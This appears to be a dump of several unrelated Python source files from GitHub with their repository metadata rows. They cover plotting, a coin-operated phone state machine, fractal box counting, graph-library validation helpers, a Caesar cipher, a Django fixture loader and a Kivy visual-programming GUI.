color = "#{:02X}{:02X}{:02X}".format(np.uint8(np.round(r * 0xFF)),
np.uint8(np.round(g * 0xFF)),
np.uint8(np.round(b * 0xFF)))
axarr[v_idx, h_idx].add_patch(
patches.Rectangle(
(0, 0), 1.0, 1.0, facecolor=color
)
)
plt.show()
if __name__ == '__main__':
# _check_hsv_space()
# sample code for plot_1_graph()
# -------------------------------
x = np.arange(1024) / 1023
gamma_list = [1.0, 1.2, 1.5, 1.9, 2.4, 3.0]
label_list = ["gamma " + str(x) for x in gamma_list]
y_list = [x ** gamma for gamma in gamma_list]
ax1 = plot_1_graph(
fontsize=20,
figsize=(10, 8),
graph_title="Title",
graph_title_size=None,
xlabel="X Axis Label", ylabel="Y Axis Label",
axis_label_size=None,
legend_size=17,
xlim=None,
ylim=None,
xtick=None,
ytick=None,
xtick_size=None, ytick_size=None,
linewidth=3,
minor_xtick_num=None,
minor_ytick_num=None,
prop_cycle=cycler(color=g_cycle))
for y, label in zip(y_list, label_list):
ax1.plot(x, y, label=label)
plt.legend(loc='upper left')
plt.show()
| toru-ver4/sip | lib/plot_utility.py | plot_utility.py | py | 8,857 | python | en | code | 4 | github-code | 50 |
70392240156 | class CabineTelefonica:
def __init__(self):
self.saldo = 0.0
self.estado = 'INATIVO'
self.numero = ''
self.valor_moedas_validas = [0.10, 0.20, 0.50, 1.0, 2.0]
self.moedas_inseridas = []
def valida_moedas(self, lista_moedas):
for moeda in lista_moedas:
if moeda not in self.valor_moedas_validas:
return False
return True
def retorna_moedas(self):
total_moedas = sum(self.moedas_inseridas)
self.moedas_inseridas = []
self.saldo = 0.0
self.estado = 'INATIVO'
return f"Valor a ser devolvido: {total_moedas:.2f} euros"
def inativo(self, comando):
if comando == 'LEVANTAR':
self.estado = 'AGUARDANDO_MOEDAS'
return "Insira as moedas para a chamada."
else:
return "O telefone está inativo. Levante o auscultador para iniciar uma chamada."
def aguardando_moedas(self, comando):
if comando.startswith('MOEDA'):
lista_moedas = comando.split()[1:]
if self.valida_moedas([float(moeda) for moeda in lista_moedas]):
self.moedas_inseridas.extend([float(moeda) for moeda in lista_moedas])
self.saldo = sum(self.moedas_inseridas)
return f"Saldo atual: {self.saldo:.2f} euros. Digite o número de telefone ou comandos como 'POUSAR' ou 'ABORTAR'."
else:
return "Moedas inválidas. Insira apenas moedas de 10, 20, 50 centimos, 1 ou 2 euros."
elif comando == 'ABORTAR':
return self.retorna_moedas()
else:
return "Aguarde a inserção das moedas para realizar uma chamada."
def chamada_bloqueada(self):
self.estado = 'AGUARDANDO_MOEDAS'
return "Chamada bloqueada. Insira mais moedas ou desista da chamada."
def chamada_nacional(self):
custo = 0.25
if self.saldo >= custo:
self.saldo -= custo
self.estado = 'INATIVO'
return f"Chamada realizada. Saldo atual: {self.saldo:.2f} euros."
else:
self.estado = 'AGUARDANDO_MOEDAS'
return f"Saldo insuficiente para realizar a chamada. Insira mais {custo - self.saldo:.2f} euros ou desista da chamada."
def chamada_internacional(self):
custo = 1.5
if self.saldo >= custo:
self.saldo -= custo
self.estado = 'INATIVO'
return f"Chamada realizada. Saldo atual: {self.saldo:.2f} euros."
else:
self.estado = 'AGUARDANDO_MOEDAS'
return f"Saldo insuficiente para realizar a chamada!"
| Alpha241/PL2023 | TPC5/cabine.py | cabine.py | py | 2,641 | python | pt | code | 0 | github-code | 50 |
10270639147 | # -*- coding: utf-8 -*-
"""
Created on Mon Apr 20 14:18:56 2020
@author: cip18jjp
"""
def count_boxes(data, box_size, range_box ):
import numpy as np
"""
Parameters
----------
data : Pandas series
data consisting of x and y coordinates
box_size : array
Of box lengths (m).
range_box : int
DESCRIPTION.
Returns
-------
TYPE
DESCRIPTION.
"""
xdata = data['x-coord']
xmin = xdata.values.min()
ydata = data['y-coord']
ymin = ydata.values.min()
N = np.int( np.floor( range_box / box_size ) ) #No full boxes in the range
counts = list()
for i in range( N ):
for j in range(N):
xcondition = ( xdata >= xmin + i*box_size )&( xdata < xmin + (i+1)*box_size)
ycondition = ( ydata >= ymin + j*box_size )&( ydata < ymin + (j+1)*box_size)
subsetx = xdata[ xcondition ].index #return x indices where true
subsety = ydata[ ycondition ].index #return y indices where true
newid = subsetx.intersection(subsety)
counts.append( xdata[newid].count() )
counts = [ i for i in counts if i != 0 ]
return len( counts )
def f_temp( x, A, Df ):
'''
User defined function for scipy.optimize.curve_fit(),
which will find optimal values for A and Df.
'''
return Df * x + A
| jjp4595/PIN_Productivity_Project | Scripts/fractal_working.py | fractal_working.py | py | 1,437 | python | en | code | 0 | github-code | 50 |
1127226856 | import numpy as np
def separated(values, *, limit, stringify, sep):
"""
Print up to ``limit`` values with a separator.
Args:
values (list): the values to print
limit (optional, int): the maximum number of values to print (None for no limit)
stringify (callable): a function to use to convert values to strings
sep (str): the separator to use between elements (and the "... (NNN more)" continuation)
"""
count = len(values)
if limit is not None and count > limit:
values = values[:limit]
continuation = f"{sep}... ({count - limit} more)" if count > limit else ""
else:
continuation = ""
rendered = sep.join(stringify(x) for x in values)
return rendered + continuation
def comma_sep(values, limit=20, stringify=repr):
"""
Print up to ``limit`` values, comma separated.
Args:
values (list): the values to print
limit (optional, int): the maximum number of values to print (None for no limit)
stringify (callable): a function to use to convert values to strings
"""
return separated(values, limit=limit, stringify=stringify, sep=", ")
def require_dataframe_has_columns(name, df, columns):
if not set(columns).issubset(df.columns):
raise ValueError(
f"{name}: expected {comma_sep(columns)} columns, found: {comma_sep(df.columns)}"
)
def require_integer_in_range(x, variable_name, min_val=-np.inf, max_val=np.inf):
"""
A function to verify that a variable is an integer in a specified closed range.
Args:
x: the variable to check
variable_name (str): the name of the variable to print out in error messages
min_val: the minimum value that `x` can attain
min_val: the maximum value that `x` can attain
"""
if not isinstance(x, int):
raise TypeError(f"{variable_name}: expected int, found {type(x).__name__}")
if x < min_val or x > max_val:
if min_val == -np.inf:
region = f"<= {max_val}"
elif max_val == np.inf:
region = f">= {min_val}"
else:
region = f"in the range [{min_val}, {max_val}]"
raise ValueError(f"{variable_name}: expected integer {region}, found {x}")
| stellargraph/stellargraph | stellargraph/core/validation.py | validation.py | py | 2,274 | python | en | code | 2,810 | github-code | 50 |
37228476875 | dizionario = {'a':'b','b':'c','c':'d','d':'e','e':'f','f':'g','g':'h','h':'i','i':'l','l':'m','m':'n','n':'o','o':'p','p':'q','q':'r',
'r':'s','s':'t','t':'u','u':'v','v':'z','z':'a'}
parola = input('Inserisci la parola: ')
NuovaStr=""
for i in parola:
NuovaStr+=dizionario[i]
print(NuovaStr)
decodificatore={} #dizionario vuoto
for k, v in dizionario.items(): #ciclo for che lavora simultaneamente su piu' variabili
#print(k,v) stampa tutto il dizionario con chiave e argomento
decodificatore[v]=k
NuovaStr2=""
for lettera in NuovaStr:
NuovaStr2=NuovaStr2+decodificatore[lettera]
print(NuovaStr2)
| theCocoCj/Python | cifrario_Cesare.py | cifrario_Cesare.py | py | 636 | python | it | code | 2 | github-code | 50 |
22797019505 | import json
from django.conf import settings
from django.core.management import BaseCommand
from mainapp.models import ProductCategory, Product
from authapp.models import ShopUser
def load_from_json(file_name):
with open(f'{settings.BASE_DIR}/json/{file_name}.json', encoding='utf-8') as json_file:
return json.load(json_file)
class Command(BaseCommand):
def handle(self, *args, **options):
categories = load_from_json('categories')
ProductCategory.objects.all.delete()
for cat in categories:
ProductCategory.objects.create(**cat)
products = load_from_json('products')
Product.objects.all().delete()
for prod in products:
category_name = prod['category']
_cat = ProductCategory.objects.get(name=category_name)
prod['category'] = _cat
ProductCategory.objects.create(**prod)
super_user = ShopUser.objects.create_superuser('django',
'django@geekshop.local', 'geekbrains', age=33)
| ZaharBerdnikov/geekshop | mainapp/management/commands/fill.py | fill.py | py | 1,071 | python | en | code | 0 | github-code | 50 |
70401183515 | import io
import copy
import kivy
from kivy.app import App
from kivy.uix.button import Button
from kivy.uix.filechooser import FileChooserIconView
from kivy.uix.floatlayout import FloatLayout
from kivy.uix.label import Label
from kivy.uix.togglebutton import ToggleButton
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.gridlayout import GridLayout
from kivy.uix.stacklayout import StackLayout
from kivy.uix.scrollview import ScrollView
from kivy.uix.tabbedpanel import TabbedPanelItem
from kivy.properties import ObjectProperty
from kivy.properties import NumericProperty, BooleanProperty
from kivy.uix.behaviors import ButtonBehavior
from kivy.graphics import Rectangle, Color
from Component import process_component
import GUI_to_code
import glob, os
import pickle
import tkinter as tk
from tkinter import messagebox
from tkinter import filedialog
#import wx
import shutil
import Pyro4
import time
from socket import socket, AF_INET, SOCK_DGRAM, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR
kivy.require('1.9.2') # replace with your current kivy version !
cwd = os.path.dirname(os.path.abspath(__file__))
sep = os.sep
comp_files_path = os.path.join(cwd, r'components', r'comp_files')
flow_control_components_path = os.path.join(cwd, r'components', r'flow control')
GUI_output_path = os.path.join(cwd, r'GUI_output.txt')
GUI_to_code_path = os.path.join(cwd, r'GUI_to_code.py')
objects_uris_path = os.path.join(cwd, r'objects_uris.conf')
python_command = 'python'
program_name = 'Graspy'
file_path_text = 'File path: '
line_components_separator = '\t'
MAGIC = 'Broadcast'
seconds_to_listen = 10
broadcast_port_label = 'broadcast_port'
special_comps_list = ['FOR_RANGE', 'IF', 'ELSE_IF', 'ELSE', 'WHILE', 'END', 'START_THREADS', 'new_thread',
'end_thread', 'CLOSE_THREADS', 'variable']
indents_comps_list = ['FOR_RANGE', 'IF', 'ELSE_IF', 'ELSE', 'WHILE']
unindents_comps_list = ['ELSE_IF', 'ELSE', 'END']
attributes_to_copy = ['outputs_list', 'inputs_dict', 'name', 'text', 'index_number', 'num_of_indents',
'inputs', 'inputs_number', 'outputs', 'real_name', 'outputs_number', 'id', 'parallel_state']
categories_components_dict = dict()
g_zoom_level = 1
zoom_factor = 4/3
class LeftComponent(Button):
pass
class ComponentsArea(StackLayout):
pass
class InputButton(ToggleButton):
pass
class OutputButton(Button):
pass
class CenterComponent(ButtonBehavior, GridLayout):
parallel_state = NumericProperty(1)
inputs_number = NumericProperty(0)
outputs_number = NumericProperty(0)
index_number = NumericProperty(0)
num_of_indents = NumericProperty(0)
size_of_first = NumericProperty(0)
unzoom_level = NumericProperty(g_zoom_level)
font_size = NumericProperty(16)
start_selected = BooleanProperty(False)
symbols_list = ['o', '=', '||']
def change_font_size(self, mylabel):
mylabel.font_size = 16 / g_zoom_level
def change_parallel_state(self, button):
self.parallel_state = (self.parallel_state + 1) % 3
button.text = self.symbols_list[self.parallel_state]
def parallel_state_text(self):
return self.symbols_list[self.parallel_state]
class SaveDialog(FloatLayout):
save = ObjectProperty(None)
text_input = ObjectProperty(None)
cancel = ObjectProperty(None)
class LoadDialog(FloatLayout):
load = ObjectProperty(None)
cancel = ObjectProperty(None)
class MainScreen(BoxLayout):
but = CenterComponent()
current_indentation = NumericProperty(0)
current_component = None
current_output_component = None
current_input = None
user_selected = BooleanProperty(True)
selected_index = 0
current_comp_id_number = 0
components_list = []
new_categories_set = set()
input_list = BooleanProperty(False)
max_canvas_width = NumericProperty(0)
start_selected = BooleanProperty(True)
def __init__(self):
super().__init__()
def start_component_pressed(self, my_widget):
self.start_selected = True
self.current_indentation = 0
for index, widget in enumerate(self.ids.main_canvas.children):
if widget == my_widget:
self.selected_index = index
if isinstance(widget, CenterComponent):
widget.start_selected = False
def remove_component(self, id):
this_widget_list = filter(lambda x: x.id == id, self.ids.main_canvas.children)
self.ids.main_canvas.remove_widget(next(this_widget_list))
# for widget in self.ids.main_canvas.children:
# if widget.id == id:
# self.ids.main_canvas.remove_widget(widget)
def left_component_pressed(self, widget):
self.start_selected = False
for other_widget in self.ids.main_canvas.children:
if isinstance(other_widget, CenterComponent):
other_widget.start_selected = False
m_canvas = self.ids.main_canvas
but = CenterComponent()
but.bind(on_release=self.center_component_pressed)
but.name = widget.name
but.text = widget.text
but.index_number = self.current_comp_id_number
but.unzoom_level = g_zoom_level
but.start_selected = True
inputs_dict = dict()
outputs_list = list()
try:
this_comp = [component for component in self.components_list
if component.component_name == widget.name].__getitem__(0)
if (this_comp.component_name in unindents_comps_list) and self.current_indentation == 0:
return
for input in this_comp.inputs:
inputs_dict[input.label] = input.value
but.inputs_number = len(this_comp.inputs)
but.inputs = copy.deepcopy(this_comp.inputs)
except (IndexError, TypeError):
but.inputs_number = 0
but.inputs = []
try:
this_comp = [component for component in self.components_list
if component.component_name == widget.name].__getitem__(0)
for output in this_comp.outputs:
outputs_list.append(output.label)
but.outputs_list = outputs_list
but.outputs_number = len(outputs_list)
but.outputs = copy.deepcopy(this_comp.outputs)
but.real_name = this_comp.component_name
except (IndexError, TypeError):
but.outputs_number = 0
but.outputs_list = []
but.real_name = widget.name
print(but.real_name)
but.inputs_dict = inputs_dict
but.id = widget.name + '_' + str(self.current_comp_id_number)
if this_comp.component_name in unindents_comps_list:
self.current_indentation -= 1
but.num_of_indents = self.current_indentation
if this_comp.component_name in indents_comps_list:
self.current_indentation += 1
self.max_canvas_width = max(self.max_canvas_width, but.width + self.current_indentation * 40)
but.remove_component = self.remove_component
print(but.num_of_indents)
m_canvas.add_widget(but, self.selected_index)
self.current_comp_id_number += 1
def center_component_pressed(self, my_widget):
if self.user_selected:
print(my_widget.num_of_indents)
self.start_selected = False
self.current_component = my_widget
self.current_indentation = my_widget.num_of_indents + (1 if my_widget.real_name in indents_comps_list else 0)
# self.ids.inputs_list.clear_widgets()
for index, widget in enumerate(self.ids.main_canvas.children):
if isinstance(widget, CenterComponent):
widget.start_selected = False
if widget == my_widget:
widget.start_selected = True
self.selected_index = index
self.populate_inputs_list(my_widget)
self.set_values_to_default()
self.ids.component_inputs_label.text = my_widget.text + ' ' + str(my_widget.index_number)
else:
self.current_output_component = my_widget
for index, widget in enumerate(self.ids.main_canvas.children):
if widget == my_widget:
if index > self.selected_index:
self.populate_outputs_list(my_widget)
else:
self.ids.outputs_list.clear_widgets()
self.ids.selected_output.text = 'select component'
def make_components_box(self, category_name):
components_area = ComponentsArea()
components_area.id = category_name + '_box'
if category_name in categories_components_dict.keys():
for component in categories_components_dict[category_name]:
comp = LeftComponent()
comp.bind(on_release=self.left_component_pressed)
comp.name = component[1]
comp.text = component[0]
components_area.add_widget(comp)
return components_area
def make_new_category(self, category_name, index=0):
components_categories = self.ids.components_categories
new_tab = TabbedPanelItem()
new_tab.id = category_name
new_tab.text = category_name
components_box = self.make_components_box(category_name)
new_scroll = ScrollView()
new_scroll.add_widget(components_box)
new_tab.add_widget(new_scroll)
components_categories.add_widget(new_tab, index + 1)
def input_pressed(self, input):
self.current_input = input
self.ids.input_description.text = 'Description:\n' + input.description
self.ids.input_value.text = 'Value:\n' + str(input.value)
self.input_list = input.type == 'list'
if self.user_selected:
if input.type == 'list':
self.ids.open_outputs_button.text = self.ids.open_outputs_button.input_text
self.populate_input_values_list()
else:
self.ids.open_outputs_button.text = ''
else:
self.ids.open_outputs_button.text = self.ids.open_outputs_button.output_text
def populate_input_values_list(self):
values_list = [value for value in [input.type_values for input in self.current_component.inputs
if input.label == self.current_input.label].__getitem__(0)]
try:
self.ids.outputs_list.clear_widgets()
for value in values_list:
btn = Button(text=str(value), size_hint_y=None, height=44)
btn.bind(on_release=self.input_value_pressed)
self.ids.outputs_list.add_widget(btn)
except ReferenceError:
pass
@staticmethod
def delete_files_from_folder(folder):
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print(e)
def process_components_path(self, components_path):
components_str = ''
for file in glob.glob(components_path + sep + "*.comp"):
component = process_component(file)
components_str += component.component_name + ' = ' +\
component.object_name + '.' + component.component_name + '\n'
# print(component)
self.components_list.append(component)
if component.component_category not in categories_components_dict.keys():
categories_components_dict[component.component_category] = []
categories_components_dict[component.component_category].append(
(component.component_label, component.component_name))
with open(components_path + sep + 'components_str', 'w') as f:
f.write(components_str)
def build_categories(self):
for components_path in [comp_files_path, flow_control_components_path]:
self.process_components_path(components_path)
for index, category_name in enumerate(sorted(categories_components_dict.keys())):
self.make_new_category(category_name, index)
def populate_inputs_list(self, widget):
self.ids.inputs_list.clear_widgets()
print(widget.id)
try:
for input in widget.inputs:
but = InputButton(text=input.label)
but.name = input.name
but.label = input.label
but.description = input.description
but.value = input.value
but.type = input.type
print(input.value)
but.bind(on_release=self.input_pressed)
self.ids.inputs_list.add_widget(but)
except AttributeError:
pass
def populate_outputs_list(self, my_widget):
self.ids.outputs_list.clear_widgets()
self.ids.selected_output.text = 'select output'
for output in my_widget.outputs_list:
btn = OutputButton(text=output)
btn.bind(on_release=self.output_value_pressed)
self.ids.outputs_list.add_widget(btn)
def output_value_pressed(self, output_button):
self.ids.outputs_list.select(output_button.text)
print('object: ', output_button.text)
self.ids.selected_output.text = str(output_button.text)
text = 'component: ' + self.current_output_component.name + ' ' + \
str(self.current_output_component.index_number) + '\noutput: ' + str(output_button.text)
self.change_input_value(text)
self.ids.input_value.text = 'Value:\n' + text
self.from_user_pressed(True)
def input_value_pressed(self, input_value_button):
self.ids.outputs_list.select(input_value_button.text)
self.change_input_value(input_value_button.text)
print(input_value_button.text)
self.ids.input_value.text = 'Value:\n' + input_value_button.text
def output_selected(self, instance):
self.ids.selected_output.text = instance
def from_user_pressed(self, state):
self.user_selected = state
self.ids.outputs_list.clear_widgets()
if state:
self.ids.from_user.state = 'down'
self.ids.from_component.state = 'normal'
self.ids.selected_output.text = ''
if self.current_input.type == 'list':
self.populate_input_values_list()
self.ids.open_outputs_button.text = self.ids.open_outputs_button.input_text
else:
self.ids.open_outputs_button.text = ''
else:
self.ids.open_outputs_button.text = self.ids.open_outputs_button.output_text
self.ids.from_component.state = 'down'
self.ids.from_user.state = 'normal'
def from_component_pressed(self):
self.from_user_pressed(False)
self.ids.outputs_list.clear_widgets()
self.ids.selected_output.text = 'select component'
def from_file_pressed(self):
self.user_selected = False
self.ids.from_component.state = 'normal'
self.ids.from_user.state = 'normal'
self.ids.from_file.state = 'down'
self.ids.outputs_list.clear_widgets()
self.ids.selected_output.text = 'select file'
root = tk.Tk()
root.withdraw()
file_path = filedialog.askopenfilename()
self.user_selected = True
self.ids.from_component.state = 'normal'
self.ids.from_user.state = 'down'
self.ids.from_file.state = 'normal'
if len(file_path) == 0:
print('empty path')
return
print(file_path)
self.ids.input_value.text = file_path_text + file_path
self.change_input_value(file_path_text + file_path)
def set_values_to_default(self):
self.ids.input_value.text = self.ids.input_value.default_text
self.ids.input_description.text = self.ids.input_description.default_text
def change_input_value(self, text):
# for comp_widget in self.ids.main_canvas.children:
# if not (comp_widget.id == 'start_button' or comp_widget.id is None):
# if comp_widget.index_number == self.current_comp_id_number:
# current_widget = comp_widget
# break
# component_inputs = [comp.inputs for comp in self.components_list if
# comp.component_name == current_widget.name].__getitem__(0)
try:
for input in self.current_component.inputs:
if input.label == self.current_input.label:
input.value = text
break
self.populate_inputs_list(self.current_component)
except:
self.ids.input_value.text = 'Error!'
def on_enter(self, text):
print('User pressed enter in', text)
self.ids.input_value.text = 'Value:\n' + text
self.change_input_value(text)
self.ids.user_text_input.text = ''
def return_component_line(self, value):
# self.current_component.name + ' ' + str(self.current_component.index_number)
#
# str(output_button.text)
value_parts = value.split('\noutput: ')
comp_label, index = value_parts[0].replace('component: ', '').strip().split(' ')
output_name = value_parts[1].strip()
output_index = -1
Break = False
for widget in self.ids.main_canvas.children[::-1]:
if isinstance(widget, CenterComponent):
if widget.name == comp_label and widget.index_number == int(index):
comp_name = widget.real_name
for tmp_index, output in enumerate(widget.outputs_list):
if output_name == output:
output_index = tmp_index
Break = True
break
if Break:
break
index = int(index)
if comp_name == 'variable':
return '__variable__', str(widget.inputs[0].value)
return comp_name, str(index), str(output_index)
def do_unzoom(self):
global g_zoom_level
g_zoom_level *= zoom_factor
for widget in self.ids.main_canvas.children[::-1]:
if isinstance(widget, CenterComponent):
widget.unzoom_level = g_zoom_level
widget.do_layout()
self.ids.main_canvas.canvas.ask_update()
def do_zoom(self):
global g_zoom_level
g_zoom_level /= zoom_factor
for widget in self.ids.main_canvas.children[::-1]:
if isinstance(widget, CenterComponent):
widget.unzoom_level = g_zoom_level
widget.do_layout()
self.ids.main_canvas.canvas.ask_update()
def run_pressed(self):
with io.open(GUI_output_path, "w", encoding="utf-8") as GUI_output:
print('==================')
for widget in self.ids.main_canvas.children[::-1]:
if isinstance(widget, CenterComponent):
prefix = 'component' + line_components_separator
index_number = line_components_separator + str(widget.index_number)
if widget.real_name in special_comps_list:
prefix = ''
index_number = ''
line = prefix + widget.real_name + index_number
for input in widget.inputs:
tmp_value = input.value
try:
if input.value.startswith('component: '):
tmp_value = '$'.join(self.return_component_line(input.value))
except AttributeError:
pass
line = line + line_components_separator + str(tmp_value)
line += line_components_separator + 'parallel_state ' + str(widget.parallel_state)
print(line)
line += '\n'
GUI_output.write(line)
# GUI_output.write(line)
# GUI_output.close()
print('GUI_to_code main call')
GUI_to_code.main(GUI_output_path)
# os.system(python_command + ' "' + GUI_to_code_path + '"')
print('==================')
def save_file(self, save_comps_path):
list_to_dump = [self.current_comp_id_number]
for widget in self.ids.main_canvas.children[::-1]:
if isinstance(widget, CenterComponent):
tmp_dict = dict()
for attribute in attributes_to_copy:
try:
tmp_dict[attribute] = widget.__getattribute__(attribute)
except AttributeError:
print('Error found!')
pass
list_to_dump.append(tmp_dict)
try:
pickle.dump(list_to_dump, open(save_comps_path, 'wb'))
except FileNotFoundError:
pass
def change_index_of_outputs(self, component, add_index):
new_inputs_list = []
for input in component.inputs:
try:
if input.value.startswith('component: '):
value_parts = input.value.split('\noutput: ')
comp_label, index = value_parts[0].split(' ')
index = int(index)
index += add_index
value_parts[0] = ' '.join([comp_label, str(index)])
input.value = '\noutput: '.join(value_parts)
except AttributeError:
pass
new_inputs_list.append(input)
component.inputs = new_inputs_list
return component
def load_file(self, load_comps_path):
try:
list_from_dump = pickle.load(open(load_comps_path, "rb"))
self.current_comp_id_number = max(self.current_comp_id_number, list_from_dump.pop(0))
max_index = 0
for widget_dict in list_from_dump:
m_canvas = self.ids.main_canvas
but = CenterComponent()
but.bind(on_release=self.center_component_pressed)
for name, value in widget_dict.items():
but.__setattr__(name, value)
print(name, value)
but = self.change_index_of_outputs(but, self.current_comp_id_number)
but.index_number += self.current_comp_id_number
max_index = max(max_index, but.index_number)
m_canvas.add_widget(but, self.selected_index)
but.remove_component = self.remove_component
but.ids.do_parallel.text = but.parallel_state_text()
self.current_comp_id_number = max_index + 1
except FileNotFoundError:
pass
def show_save(self):
root = tk.Tk()
root.withdraw()
myFormats = [('Graspy files', '*.grp'), ('Any file', '*')]
file_path = filedialog.asksaveasfilename(filetypes=myFormats)
#file_path = wx_save_as_dialog()
if file_path == None:
return
file_path += '.grp' if not file_path.endswith('.grp') else ''
print(file_path)
self.save_file(file_path)
def show_load(self):
root = tk.Tk()
root.withdraw()
myFormats = [('Graspy files', '*.grp'), ('Any file', '*')]
file_path = filedialog.askopenfilename(filetypes=myFormats)
#file_path = wx_open_dialog('*.grp')
if file_path == None:
return
print(file_path)
self.load_file(file_path)
class GUI_mainApp(App):
def build(self):
self.title = program_name
return MainScreen()
def components_from_object(object):
print(type(object))
files_str = object.get_component_files()
print(files_str)
files_separator = "===="
files_lines = files_str.split("\n")
fout = None
for line in files_lines:
if "component_filename" in line.strip():
file_str = ""
filename = line.strip().split(":")
filename = filename[1]
filepath = os.path.join(comp_files_path, filename)
elif line.strip() == files_separator.strip():
fout = open(filepath, "w")
file_str = file_str.split("\n")[:-1]
file_str = "\n".join(file_str)
fout.write(file_str)
fout.close()
file_str = ""
elif line.strip() == "":
continue
else:
file_str += line + "\n"
def update_objects_uris(objects_uris_path, port):
s = socket(AF_INET, SOCK_DGRAM) # create UDP socket
s.bind(('', port))
s.settimeout(4.0)
uris_set = set()
start_time = time.time()
while (time.time() - start_time) < seconds_to_listen:
try:
data, addr = s.recvfrom(1024) # wait for a packet
except:
continue
if data.startswith(bytes(MAGIC, 'utf8')):
tmp_uri = bytes.decode(data[len(MAGIC):]).strip()
short_uri = tmp_uri.strip().split('$$')[1]
tmp_object = Pyro4.Proxy(short_uri)
tmp_object.stop_broadcast()
uris_set.add(tmp_uri)
print("got service announcement from", data[len(MAGIC):])
if len(uris_set) > 0:
string_to_write = '\n'.join(uris_set)
print(string_to_write)
with open(objects_uris_path, 'w') as f:
f.write(string_to_write)
def retrieve_comp_files():
broadcast_port = GUI_to_code.find_port(broadcast_port_label)
print(broadcast_port)
print(broadcast_port_label)
MainScreen.delete_files_from_folder(comp_files_path)
update_objects_uris(objects_uris_path, broadcast_port)
objects_uris_file = open(objects_uris_path, encoding='utf8')
for line in objects_uris_file:
uri = line.strip().split('$$')[1]
object = Pyro4.Proxy(uri)
components_from_object(object)
if __name__ == '__main__':
root = tk.Tk()
root.withdraw()
response = messagebox.askyesno("Update components", "Would you like to update component files?")
# #response = wx_yes_no_dialog("Would you like to update component files?", "Update components")
if response:
retrieve_comp_files()
GUI_mainApp().run()
| dkatsios/Graspy | User/GUI_main.py | GUI_main.py | py | 27,302 | python | en | code | 0 | github-code | 50 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.